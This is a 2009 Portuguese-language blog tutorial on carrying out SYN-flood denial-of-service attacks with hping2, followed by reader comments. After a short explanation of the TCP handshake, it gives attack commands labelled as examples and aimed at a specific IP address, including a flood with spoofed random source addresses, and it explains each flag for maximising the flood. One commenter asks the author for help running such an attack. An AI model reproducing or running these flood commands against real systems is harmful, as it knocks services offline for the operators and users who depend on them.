Denial of Service, explicaçao pratica

Publicado: maio 9, 2009 em ataques, linux, normal, seguranca
Tags:, , , , , ,

Denial of Service
Vou dar só uma explicada basica, Com uma ferramenta chamada: Hping.
O Hping é uma ferramenta muito utilizada para fazer ataques denial of service, essa ferramenta é muito poderosa quando se fala de ataques do tipo DoS(denial of service), esse ataque é feito com um cliente – servidor,  esses mensagens cliente – servidor são trocadas em 3 vias.
O cliente envia uma requisiçao de conexão com o servidor com uma pacote com flag syn com um determinado numero de seguencia X.  O servidor responder com outra mensagem do tipo: Syn-ack com um numero de sequencia X+1 e y. O cliente reconhece o pacote Syn-ack com y +1 E a conexao está estabelecida.
Depois disso a conexao é fechada quando o cliente ou servidor manda um pacote com flag fin ou forma abrupta com uma flag rst. Com base nestes conhecimentos, um ataque do tipo syn-flood ou enxurrada de pacotes é utilizado para desestabilizar ou derrubar recursos computacionais e podem acontecer em varios niveis do protocolo TCP.

EXEMPLO1 DO ATAQUE

# hping2 <host da vitima > <paramentros>

# hping2 205.102.88.18 -p 80 -S -c 3
HPING 205.102.88.18 (eth0 23.23.23.2): S set, 40 headers + 0 data bytes
len=44 ip=205.102.88.18 ttl=64 DF id=0 sport=80 flags=SA seq=0 win=32792 rtt=0.2 ms
len=44 ip=205.102.88.18 ttl=64 DF id=0 sport=80 flags=SA seq=1 win=32792 rtt=0.1 ms
len=44 ip=205.102.88.18 ttl=64 DF id=0 sport=80 flags=SA seq=2 win=32792 rtt=0.1 ms

explicaçao:
nesta linha disparamos: -p 80 -c 3 (-p é a porta de envio dos pacotes.) – (-c –count  seta a quantidade de pacotes)

EXEMPLO2 DO ATAQUE
# hping2 205.102.88.18 -p 80 -S –faster –rand-source
HPING 205.102.88.18 (eth0 205.102.88.18): S set, 40 headers + 0 data bytes

neste paramentro disparamos para a porta 80 (-p 80)   –  (-S setamos a flag como syn)   –   (–faster Alias for -i u10000).Hping irá enviar 10 pacotes por segundos; –rand-source habilita o modo radom e troca o ip de origem dinamicamente). Desta forma o ataque será muito bruto, pois enviaremos 10 tentativas de conexao sem esperar a resposta do host-alvo com ips diferentes a cada pacote enviado. Até que o alvo esteja impossibilitado de responder a todas as requisiçoes e o kernel negará o servico

EXEMPLO3 DO ATAQUE
# hping2 205.102.88.18 -p 80 -S –faster –rand-dest
HPING 205.102.88.18 (eth0 205.102.88.18): S set, 40 headers + 0 data bytes

Neste parametro disparamos: -p 80 -S –fast –rand-dest.
———————————————————————————————————————————————
As flags podem ser setadas das seguintes formas:

* -F –fin – Seta FIN tcp flag.
* -S –syn -Seta SYN tcp flag.
* -R –rst – Seta RST tcp flag.
* -P –push – Seta PUSH tcp flag.
* -A –ack – Seta ACK tcp flag.
* -U –urg – Set URG tcp flag.
* -X –xmas – Set Xmas tcp flag.

Modo de escuta:
$ -9 –listen signature
HPING2 em modo de escuta. Utilizando esta opção o hping aguarda pelo pacote que contém esta assinatura e finaliza o pacote que contém a assinatura.

Exemplo.:
# hping2 -9 –listen 234-09sdflkjs45 -TESThello_word

Gostou do tutorial ?

Então  deixe o seu comentario aqui

comentários
  1. Hehe disse:

    Hehe, tambem gostei muito do post… Vo passar aqui mais Vezes.

  2. Raphael disse:

    Parabens velho!

  3. @Echo disse:

    VOCE PODIA ME AJUDAR A FAZER UM ATAQUE ASSIM

  4. karen disse:

    então amigo o assunto é interessante mas neste caso o mais dificil é conseguir a base de dados para realizar o ataque não é?E outro coisa de qual pc isto seria feito da nossa propria máquina?

  5. Frederico disse:

    Excelente post, apesar de ser um pouco a frente para um iniciante.

    Forte Abraço!

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s